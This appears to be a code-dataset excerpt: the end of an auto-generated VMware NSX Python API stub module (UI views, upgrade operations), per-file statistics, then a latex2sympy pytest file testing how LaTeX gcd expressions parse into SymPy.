type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/ui-views',
request_body_parameter='view',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'view_id': type.StringType(),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/api/v1/ui-views/{view-id}',
path_variables={
'view_id': 'view-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'tag': type.OptionalType(type.StringType()),
'view_ids': type.OptionalType(type.StringType()),
'widget_id': type.OptionalType(type.StringType()),
})
get_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ui-views',
path_variables={
},
query_parameters={
'tag': 'tag',
'view_ids': 'view_ids',
'widget_id': 'widget_id',
},
content_type='application/json'
)
# properties for get_0 operation
get_0_input_type = type.StructType('operation-input', {
'view_id': type.StringType(),
})
get_0_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
get_0_input_value_validator_list = [
]
get_0_output_validator_list = [
]
get_0_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/api/v1/ui-views/{view-id}',
path_variables={
'view_id': 'view-id',
},
query_parameters={
},
content_type='application/json'
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'view_id': type.StringType(),
'view': type.ReferenceType('com.vmware.nsx.model_client', 'View'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PUT',
url_template='/api/v1/ui-views/{view-id}',
request_body_parameter='view',
path_variables={
'view_id': 'view-id',
},
query_parameters={
},
content_type='application/json'
)
operations = {
'create': {
'input_type': create_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'View'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': create_output_validator_list,
'task_type': TaskType.NONE,
},
'delete': {
'input_type': delete_input_type,
'output_type': type.VoidType(),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': delete_output_validator_list,
'task_type': TaskType.NONE,
},
'get': {
'input_type': get_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'ViewList'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': get_output_validator_list,
'task_type': TaskType.NONE,
},
'get_0': {
'input_type': get_0_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'View'),
'errors': get_0_error_dict,
'input_value_validator_list': get_0_input_value_validator_list,
'output_validator_list': get_0_output_validator_list,
'task_type': TaskType.NONE,
},
'update': {
'input_type': update_input_type,
'output_type': type.ReferenceType('com.vmware.nsx.model_client', 'View'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': update_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
'get_0': get_0_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.ui_views',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class _UpgradeStub(ApiInterfaceStub):
def __init__(self, config):
# properties for abortpreupgradechecks operation
abortpreupgradechecks_input_type = type.StructType('operation-input', {})
abortpreupgradechecks_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
abortpreupgradechecks_input_value_validator_list = [
]
abortpreupgradechecks_output_validator_list = [
]
abortpreupgradechecks_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/upgrade?action=abort_pre_upgrade_checks',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
# properties for executepostupgradechecks operation
executepostupgradechecks_input_type = type.StructType('operation-input', {
'component_type': type.StringType(),
})
executepostupgradechecks_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
executepostupgradechecks_input_value_validator_list = [
]
executepostupgradechecks_output_validator_list = [
]
executepostupgradechecks_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/upgrade/{component-type}?action=execute_post_upgrade_checks',
path_variables={
'component_type': 'component-type',
},
query_parameters={
},
content_type='application/json'
)
# properties for executepreupgradechecks operation
executepreupgradechecks_input_type = type.StructType('operation-input', {
'component_type': type.OptionalType(type.StringType()),
'cursor': type.OptionalType(type.StringType()),
'included_fields': type.OptionalType(type.StringType()),
'page_size': type.OptionalType(type.IntegerType()),
'sort_ascending': type.OptionalType(type.BooleanType()),
'sort_by': type.OptionalType(type.StringType()),
})
executepreupgradechecks_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
executepreupgradechecks_input_value_validator_list = [
]
executepreupgradechecks_output_validator_list = [
]
executepreupgradechecks_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/upgrade?action=execute_pre_upgrade_checks',
path_variables={
},
query_parameters={
'component_type': 'component_type',
'cursor': 'cursor',
'included_fields': 'included_fields',
'page_size': 'page_size',
'sort_ascending': 'sort_ascending',
'sort_by': 'sort_by',
},
content_type='application/json'
)
# properties for upgradeuc operation
upgradeuc_input_type = type.StructType('operation-input', {})
upgradeuc_error_dict = {
'com.vmware.vapi.std.errors.service_unavailable':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'ServiceUnavailable'),
'com.vmware.vapi.std.errors.invalid_request':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidRequest'),
'com.vmware.vapi.std.errors.internal_server_error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InternalServerError'),
'com.vmware.vapi.std.errors.unauthorized':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthorized'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
}
upgradeuc_input_value_validator_list = [
]
upgradeuc_output_validator_list = [
]
upgradeuc_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/api/v1/upgrade?action=upgrade_uc',
path_variables={
},
query_parameters={
},
content_type='application/json'
)
operations = {
'abortpreupgradechecks': {
'input_type': abortpreupgradechecks_input_type,
'output_type': type.VoidType(),
'errors': abortpreupgradechecks_error_dict,
'input_value_validator_list': abortpreupgradechecks_input_value_validator_list,
'output_validator_list': abortpreupgradechecks_output_validator_list,
'task_type': TaskType.NONE,
},
'executepostupgradechecks': {
'input_type': executepostupgradechecks_input_type,
'output_type': type.VoidType(),
'errors': executepostupgradechecks_error_dict,
'input_value_validator_list': executepostupgradechecks_input_value_validator_list,
'output_validator_list': executepostupgradechecks_output_validator_list,
'task_type': TaskType.NONE,
},
'executepreupgradechecks': {
'input_type': executepreupgradechecks_input_type,
'output_type': type.VoidType(),
'errors': executepreupgradechecks_error_dict,
'input_value_validator_list': executepreupgradechecks_input_value_validator_list,
'output_validator_list': executepreupgradechecks_output_validator_list,
'task_type': TaskType.NONE,
},
'upgradeuc': {
'input_type': upgradeuc_input_type,
'output_type': type.VoidType(),
'errors': upgradeuc_error_dict,
'input_value_validator_list': upgradeuc_input_value_validator_list,
'output_validator_list': upgradeuc_output_validator_list,
'task_type': TaskType.NONE,
},
}
rest_metadata = {
'abortpreupgradechecks': abortpreupgradechecks_rest_metadata,
'executepostupgradechecks': executepostupgradechecks_rest_metadata,
'executepreupgradechecks': executepreupgradechecks_rest_metadata,
'upgradeuc': upgradeuc_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.nsx.upgrade',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=False)
class StubFactory(StubFactoryBase):
_attrs = {
'Associations': Associations,
'Batch': Batch,
'BridgeClusters': BridgeClusters,
'BridgeEndpointProfiles': BridgeEndpointProfiles,
'BridgeEndpoints': BridgeEndpoints,
'Cluster': Cluster,
'ClusterProfiles': ClusterProfiles,
'ComputeCollectionTransportNodeTemplates': ComputeCollectionTransportNodeTemplates,
'EdgeClusters': EdgeClusters,
'ErrorResolver': ErrorResolver,
'FailureDomains': FailureDomains,
'GlobalConfigs': GlobalConfigs,
'HostSwitchProfiles': HostSwitchProfiles,
'IpSets': IpSets,
'IpfixCollectorProfiles': IpfixCollectorProfiles,
'IpfixObsPoints': IpfixObsPoints,
'IpfixProfiles': IpfixProfiles,
'Licenses': Licenses,
'LogicalPorts': LogicalPorts,
'LogicalRouterPorts': LogicalRouterPorts,
'LogicalRouters': LogicalRouters,
'LogicalSwitches': LogicalSwitches,
'MacSets': MacSets,
'ManualHealthChecks': ManualHealthChecks,
'MdProxies': MdProxies,
'MirrorSessions': MirrorSessions,
'NetworkMigrationSpecs': NetworkMigrationSpecs,
'Node': Node,
'Normalizations': Normalizations,
'NotificationWatchers': NotificationWatchers,
'NsGroups': NsGroups,
'NsProfiles': NsProfiles,
'NsServiceGroups': NsServiceGroups,
'NsServices': NsServices,
'ServiceConfigs': ServiceConfigs,
'SwitchingProfiles': SwitchingProfiles,
'Tasks': Tasks,
'Traceflows': Traceflows,
'TransportNodeCollections': TransportNodeCollections,
'TransportNodeProfiles': TransportNodeProfiles,
'TransportNodes': TransportNodes,
'TransportZones': TransportZones,
'TransportzoneProfiles': TransportzoneProfiles,
'TrustManagement': TrustManagement,
'UiViews': UiViews,
'Upgrade': Upgrade,
'aaa': 'com.vmware.nsx.aaa_client.StubFactory',
'administration': 'com.vmware.nsx.administration_client.StubFactory',
'app_discovery': 'com.vmware.nsx.app_discovery_client.StubFactory',
'bridge_clusters': 'com.vmware.nsx.bridge_clusters_client.StubFactory',
'bridge_endpoints': 'com.vmware.nsx.bridge_endpoints_client.StubFactory',
'capacity': 'com.vmware.nsx.capacity_client.StubFactory',
'cluster': 'com.vmware.nsx.cluster_client.StubFactory',
'compute_collection_transport_node_templates': 'com.vmware.nsx.compute_collection_transport_node_templates_client.StubFactory',
'configs': 'com.vmware.nsx.configs_client.StubFactory',
'dhcp': 'com.vmware.nsx.dhcp_client.StubFactory',
'directory': 'com.vmware.nsx.directory_client.StubFactory',
'dns': 'com.vmware.nsx.dns_client.StubFactory',
'edge_clusters': 'com.vmware.nsx.edge_clusters_client.StubFactory',
'eula': 'com.vmware.nsx.eula_client.StubFactory',
'fabric': 'com.vmware.nsx.fabric_client.StubFactory',
'firewall': 'com.vmware.nsx.firewall_client.StubFactory',
'hpm': 'com.vmware.nsx.hpm_client.StubFactory',
'idfw': 'com.vmware.nsx.idfw_client.StubFactory',
'intelligence': 'com.vmware.nsx.intelligence_client.StubFactory',
'ip_sets': 'com.vmware.nsx.ip_sets_client.StubFactory',
'ipfix': 'com.vmware.nsx.ipfix_client.StubFactory',
'ipfix_obs_points': 'com.vmware.nsx.ipfix_obs_points_client.StubFactory',
'ipv6': 'com.vmware.nsx.ipv6_client.StubFactory',
'licenses': 'com.vmware.nsx.licenses_client.StubFactory',
'loadbalancer': 'com.vmware.nsx.loadbalancer_client.StubFactory',
'logical_ports': 'com.vmware.nsx.logical_ports_client.StubFactory',
'logical_router_ports': 'com.vmware.nsx.logical_router_ports_client.StubFactory',
'logical_routers': 'com.vmware.nsx.logical_routers_client.StubFactory',
'logical_switches': 'com.vmware.nsx.logical_switches_client.StubFactory',
'mac_sets': 'com.vmware.nsx.mac_sets_client.StubFactory',
'md_proxies': 'com.vmware.nsx.md_proxies_client.StubFactory',
'migration': 'com.vmware.nsx.migration_client.StubFactory',
'model': 'com.vmware.nsx.model_client.StubFactory',
'node': 'com.vmware.nsx.node_client.StubFactory',
'notification_watchers': 'com.vmware.nsx.notification_watchers_client.StubFactory',
'ns_groups': 'com.vmware.nsx.ns_groups_client.StubFactory',
'ns_profiles': 'com.vmware.nsx.ns_profiles_client.StubFactory',
'pbr': 'com.vmware.nsx.pbr_client.StubFactory',
'pktcap': 'com.vmware.nsx.pktcap_client.StubFactory',
'pools': 'com.vmware.nsx.pools_client.StubFactory',
'proxy': 'com.vmware.nsx.proxy_client.StubFactory',
'realization_state_barrier': 'com.vmware.nsx.realization_state_barrier_client.StubFactory',
'service_configs': 'com.vmware.nsx.service_configs_client.StubFactory',
'serviceinsertion': 'com.vmware.nsx.serviceinsertion_client.StubFactory',
'switching_profiles': 'com.vmware.nsx.switching_profiles_client.StubFactory',
'tasks': 'com.vmware.nsx.tasks_client.StubFactory',
'telemetry': 'com.vmware.nsx.telemetry_client.StubFactory',
'traceflows': 'com.vmware.nsx.traceflows_client.StubFactory',
'transport_node_collections': 'com.vmware.nsx.transport_node_collections_client.StubFactory',
'transport_nodes': 'com.vmware.nsx.transport_nodes_client.StubFactory',
'transport_zones': 'com.vmware.nsx.transport_zones_client.StubFactory',
'trust_management': 'com.vmware.nsx.trust_management_client.StubFactory',
'ui_views': 'com.vmware.nsx.ui_views_client.StubFactory',
'upgrade': 'com.vmware.nsx.upgrade_client.StubFactory',
}
| 45.182399
| 187
| 0.601347
| 84,946
| 862,532
| 5.872036
| 0.015327
| 0.076016
| 0.089133
| 0.109702
| 0.909634
| 0.894446
| 0.873404
| 0.853354
| 0.843364
| 0.835537
| 0
| 0.000897
| 0.294622
| 862,532
| 19,089
| 188
| 45.184766
| 0.818953
| 0.275284
| 0
| 0.750969
| 1
| 0.000082
| 0.321096
| 0.218118
| 0
| 0
| 0
| 0
| 0
| 1
| 0.026149
| false
| 0
| 0.00099
| 0
| 0.062196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a45a21589babe29e2e4fbea5ba501f7cdc7cb2c5
| 10,004
|
py
|
Python
|
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | 26
|
2021-05-12T09:48:28.000Z
|
2022-03-31T08:33:57.000Z
|
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | null | null | null |
tests/gcd_test.py
|
Na2CuCl4/latex2sympy
|
40f3b16ad13f8ab12d7704bb422cf8580b45b380
|
[
"MIT"
] | 3
|
2021-10-09T03:16:53.000Z
|
2022-02-18T13:23:40.000Z
|
from .context import assert_equal
import pytest
from sympy import Symbol, Rational, UnevaluatedExpr, gcd, igcd, sqrt, pi
x = Symbol('x', real=True)
y = Symbol('y', real=True)
z = Symbol('z', real=True)
def test_gcd_usual():
assert_equal("\\gcd(18, 3)", gcd(18, 3))
assert_equal("\\gcd(3, 18)", gcd(3, 18))
assert_equal("\\gcd(2, 2)", gcd(2, 2))
assert_equal("\\gcd(0, 21)", UnevaluatedExpr(gcd(0, 21)))
assert_equal("\\gcd(21, 0)", UnevaluatedExpr(gcd(21, 0)))
assert_equal("\\gcd(0, 0)", UnevaluatedExpr(gcd(0, 0)))
assert_equal("\\gcd(6128, 24)", gcd(6128, 24))
assert_equal("\\gcd(24, 6128)", gcd(24, 6128))
assert_equal("\\gcd(1E20, 1000000)", gcd(Rational('1E20'), 1000000))
assert_equal("\\gcd(128*10^32, 1)", gcd(Rational('128E32'), 1))
assert_equal("\\operatorname{gcd}(18, 3)", gcd(18, 3))
assert_equal("\\operatorname{gcd}(3, 18)", gcd(3, 18))
assert_equal("\\operatorname{gcd}(2, 2)", gcd(2, 2))
assert_equal("\\operatorname{gcd}(0, 21)", UnevaluatedExpr(gcd(0, 21)))
assert_equal("\\operatorname{gcd}(21, 0)", UnevaluatedExpr(gcd(21, 0)))
assert_equal("\\operatorname{gcd}(0, 0)", UnevaluatedExpr(gcd(0, 0)))
assert_equal("\\operatorname{gcd}(6128, 24)", gcd(6128, 24))
assert_equal("\\operatorname{gcd}(24, 6128)", gcd(24, 6128))
assert_equal("\\operatorname{gcd}(1E20, 1000000)", gcd(Rational('1E20'), 1000000))
assert_equal("\\operatorname{gcd}(128*10^32, 1)", gcd(Rational('128E32'), 1))
def test_gcd_negative():
assert_equal("\\gcd(-12, 4)", gcd(-12, 4))
assert_equal("\\gcd(219, -9)", gcd(219, -9))
assert_equal("\\gcd(-8, -64)", gcd(-8, -64))
assert_equal("\\gcd(-5, -5)", gcd(-5, -5))
assert_equal("\\gcd(-1, 182033)", gcd(-1, 182033))
assert_equal("\\gcd(25, -6125)", gcd(25, -6125))
assert_equal("\\gcd(243, -2.9543127E21)", gcd(243, Rational('-2.9543127E21')))
assert_equal("\\operatorname{gcd}(-12, 4)", gcd(-12, 4))
assert_equal("\\operatorname{gcd}(219, -9)", gcd(219, -9))
assert_equal("\\operatorname{gcd}(-8, -64)", gcd(-8, -64))
assert_equal("\\operatorname{gcd}(-5, -5)", gcd(-5, -5))
assert_equal("\\operatorname{gcd}(-1, 182033)", gcd(-1, 182033))
assert_equal("\\operatorname{gcd}(25, -6125)", gcd(25, -6125))
assert_equal("\\operatorname{gcd}(243, -2.9543127E21)", gcd(243, Rational('-2.9543127E21')))
def test_gcd_float():
assert_equal("\\gcd(2.4, 3.6)", gcd(Rational('2.4'), Rational('3.6')))
assert_equal("\\gcd(3.6, 2.4)", gcd(Rational('3.6'), Rational('2.4')))
assert_equal("\\gcd(\\pi, 3)", gcd(pi, 3))
assert_equal("\\gcd(618, 1.5)", gcd(618, Rational('1.5')))
assert_equal("\\gcd(-1.5, 618)", gcd(Rational('-1.5'), 618))
assert_equal("\\gcd(0.42, 2)", gcd(Rational('0.42'), 2))
assert_equal("\\gcd(1.43E-13, 21)", gcd(Rational('1.43E-13'), 21))
assert_equal("\\gcd(21, -143E-13)", gcd(21, Rational('-143E-13')))
assert_equal("\\gcd(9.80655, 9.80655)", gcd(Rational('9.80655'), Rational('9.80655')))
assert_equal("\\gcd(0.0000923423, -8341.234802909)", gcd(Rational('0.0000923423'), Rational('-8341.234802909')))
assert_equal("\\gcd(\\sqrt{5}, \\sqrt{2})", gcd(sqrt(5), sqrt(2)))
assert_equal("\\operatorname{gcd}(2.4, 3.6)", gcd(Rational('2.4'), Rational('3.6')))
assert_equal("\\operatorname{gcd}(3.6, 2.4)", gcd(Rational('3.6'), Rational('2.4')))
assert_equal("\\operatorname{gcd}(\\pi, 3)", gcd(pi, 3))
assert_equal("\\operatorname{gcd}(618, 1.5)", gcd(618, Rational('1.5')))
assert_equal("\\operatorname{gcd}(-1.5, 618)", gcd(Rational('-1.5'), 618))
assert_equal("\\operatorname{gcd}(0.42, 2)", gcd(Rational('0.42'), 2))
assert_equal("\\operatorname{gcd}(1.43E-13, 21)", gcd(Rational('1.43E-13'), 21))
assert_equal("\\operatorname{gcd}(21, -143E-13)", gcd(21, Rational('-143E-13')))
assert_equal("\\operatorname{gcd}(9.80655, 9.80655)", gcd(Rational('9.80655'), Rational('9.80655')))
assert_equal("\\operatorname{gcd}(0.0000923423, -8341.234802909)", gcd(Rational('0.0000923423'), Rational('-8341.234802909')))
assert_equal("\\operatorname{gcd}(\\sqrt{5}, \\sqrt{2})", gcd(sqrt(5), sqrt(2)))
def test_gcd_fraction():
assert_equal("\\gcd(1/2, 3)", gcd(Rational('1/2'), 3))
assert_equal("\\gcd(3, 1/2)", gcd(3, Rational('1/2')))
assert_equal("\\gcd(6/2, 3)", gcd(Rational('6/2'), 3))
assert_equal("\\gcd(1/10, 1/10)", gcd(Rational('1/10'), Rational('1/10')))
assert_equal("\\gcd(42, 42/6)", gcd(42, Rational('42/6')))
assert_equal("\\gcd(10000000/10, 10000)", gcd(Rational('10000000/10'), 10000))
assert_equal("\\operatorname{gcd}(1/2, 3)", gcd(Rational('1/2'), 3))
assert_equal("\\operatorname{gcd}(3, 1/2)", gcd(3, Rational('1/2')))
assert_equal("\\operatorname{gcd}(6/2, 3)", gcd(Rational('6/2'), 3))
assert_equal("\\operatorname{gcd}(1/10, 1/10)", gcd(Rational('1/10'), Rational('1/10')))
assert_equal("\\operatorname{gcd}(42, 42/6)", gcd(42, Rational('42/6')))
assert_equal("\\operatorname{gcd}(10000000/10, 10000)", gcd(Rational('10000000/10'), 10000))
def test_gcd_expr():
assert_equal("\\gcd(1+1, 8)", gcd(1 + 1, 8))
assert_equal("920*\\gcd(9, 12*4/2)", 920 * gcd(9, 12 * Rational('4/2')))
assert_equal("\\gcd(32-128, 10)*22", gcd(32 - 128, 10) * 22)
assert_equal("\\sqrt{\\gcd(1.25E24, 1E12)}", sqrt(gcd(Rational('1.25E24'), Rational('1E12'))))
assert_equal("\\gcd(92.0, 000+2)", gcd(Rational('92.0'), 000 + 2))
assert_equal("\\operatorname{gcd}(1+1, 8)", gcd(1 + 1, 8))
assert_equal("920*\\operatorname{gcd}(9, 12*4/2)", 920 * gcd(9, 12 * Rational('4/2')))
assert_equal("\\operatorname{gcd}(32-128, 10)*22", gcd(32 - 128, 10) * 22)
assert_equal("\\sqrt{\\operatorname{gcd}(1.25E24, 1E12)}", sqrt(gcd(Rational('1.25E24'), Rational('1E12'))))
assert_equal("\\operatorname{gcd}(92.0, 000+2)", gcd(Rational('92.0'), 000 + 2))
def test_gcd_symbol():
assert_equal("\\gcd(x, y)", gcd(x, y), symbolically=True)
assert_equal("\\gcd(y, -x)", gcd(y, -x), symbolically=True)
assert_equal("\\gcd(2y, x)", gcd(2 * y, x), symbolically=True)
assert_equal("\\gcd(125, 50x)", gcd(125, 50 * x), symbolically=True)
assert_equal("\\gcd(x + 76, \\sqrt{x} * 4)", gcd(x + 76, sqrt(x) * 4), symbolically=True)
assert_equal("\\gcd(y, y)", gcd(y, y), symbolically=True)
assert_equal("y + \\gcd(0.4x, 8/3) / 2", y + gcd(Rational('0.4') * x, Rational('8/3')) / 2, symbolically=True)
assert_equal("6.673E-11 * (\\gcd(8.85418782E-12, 9x) + 4) / 8y", Rational('6.673E-11') * (gcd(Rational('8.85418782E-12'), 9 * x) + 4) / (8 * y), symbolically=True)
assert_equal("\\operatorname{gcd}(x, y)", gcd(x, y), symbolically=True)
assert_equal("\\operatorname{gcd}(y, -x)", gcd(y, -x), symbolically=True)
assert_equal("\\operatorname{gcd}(2y, x)", gcd(2 * y, x), symbolically=True)
assert_equal("\\operatorname{gcd}(125, 50x)", gcd(125, 50 * x), symbolically=True)
assert_equal("\\operatorname{gcd}(x + 76, \\sqrt{x} * 4)", gcd(x + 76, sqrt(x) * 4), symbolically=True)
assert_equal("\\operatorname{gcd}(y, y)", gcd(y, y), symbolically=True)
assert_equal("y + \\operatorname{gcd}(0.4x, 8/3) / 2", y + gcd(Rational('0.4') * x, Rational('8/3')) / 2, symbolically=True)
assert_equal("6.673E-11 * (\\operatorname{gcd}(8.85418782E-12, 9x) + 4) / 8y", Rational('6.673E-11') * (gcd(Rational('8.85418782E-12'), 9 * x) + 4) / (8 * y), symbolically=True)
def test_multiple_parameters():
assert_equal("\\gcd(830,450)", gcd(830, 450))
assert_equal("\\gcd(6,321,429)", igcd(6, 321, 429))
assert_equal("\\gcd(14,2324)", gcd(14, 2324))
assert_equal("\\gcd(3, 6, 2)", igcd(3, 6, 2))
assert_equal("\\gcd(144, 2988, 37116)", igcd(144, 2988, 37116))
assert_equal("\\gcd(144,2988, 37116,18, 72)", igcd(144, 2988, 37116, 18, 72))
assert_equal("\\gcd(144, 2988, 37116, 18, 72, 12, 6)", igcd(144, 2988, 37116, 18, 72, 12, 6))
assert_equal("\\gcd(32)", gcd(32, 32))
assert_equal("\\gcd(-8, 4,-2)", gcd(-8, gcd(4, -2)))
assert_equal("\\gcd(x, y,z)", gcd(x, gcd(y, z)), symbolically=True)
assert_equal("\\gcd(6*4,48, 3)", igcd(6 * 4, 48, 3))
assert_equal("\\gcd(6*4,48,3)", igcd(6 * 4, 48, 3))
assert_equal("\\gcd(2.4,3.6, 0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
assert_equal("\\gcd(2.4,3.6,0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
assert_equal("\\gcd(\\sqrt{3},\\sqrt{2}, \\sqrt{100})", gcd(sqrt(3), gcd(sqrt(2), sqrt(100))))
assert_equal("\\gcd(1E12, 1E6,1E3, 10)", igcd(Rational('1E12'), Rational('1E6'), Rational('1E3'), 10))
assert_equal("\\operatorname{gcd}(830,450)", gcd(830, 450))
assert_equal("\\operatorname{gcd}(6,321,429)", igcd(6, 321, 429))
assert_equal("\\operatorname{gcd}(14,2324)", gcd(14, 2324))
assert_equal("\\operatorname{gcd}(3, 6, 2)", igcd(3, 6, 2))
assert_equal("\\operatorname{gcd}(144, 2988, 37116)", igcd(144, 2988, 37116))
assert_equal("\\operatorname{gcd}(144,2988, 37116,18, 72)", igcd(144, 2988, 37116, 18, 72))
assert_equal("\\operatorname{gcd}(144, 2988, 37116, 18, 72, 12, 6)", igcd(144, 2988, 37116, 18, 72, 12, 6))
assert_equal("\\operatorname{gcd}(32)", gcd(32, 32))
assert_equal("\\operatorname{gcd}(-8, 4,-2)", gcd(-8, gcd(4, -2)))
assert_equal("\\operatorname{gcd}(x, y,z)", gcd(x, gcd(y, z)), symbolically=True)
assert_equal("\\operatorname{gcd}(6*4,48, 3)", igcd(6 * 4, 48, 3))
assert_equal("\\operatorname{gcd}(6*4,48,3)", igcd(6 * 4, 48, 3))
assert_equal("\\operatorname{gcd}(2.4,3.6, 0.6)", gcd(Rational('2.4'), gcd(Rational('3.6'), Rational('0.6'))))
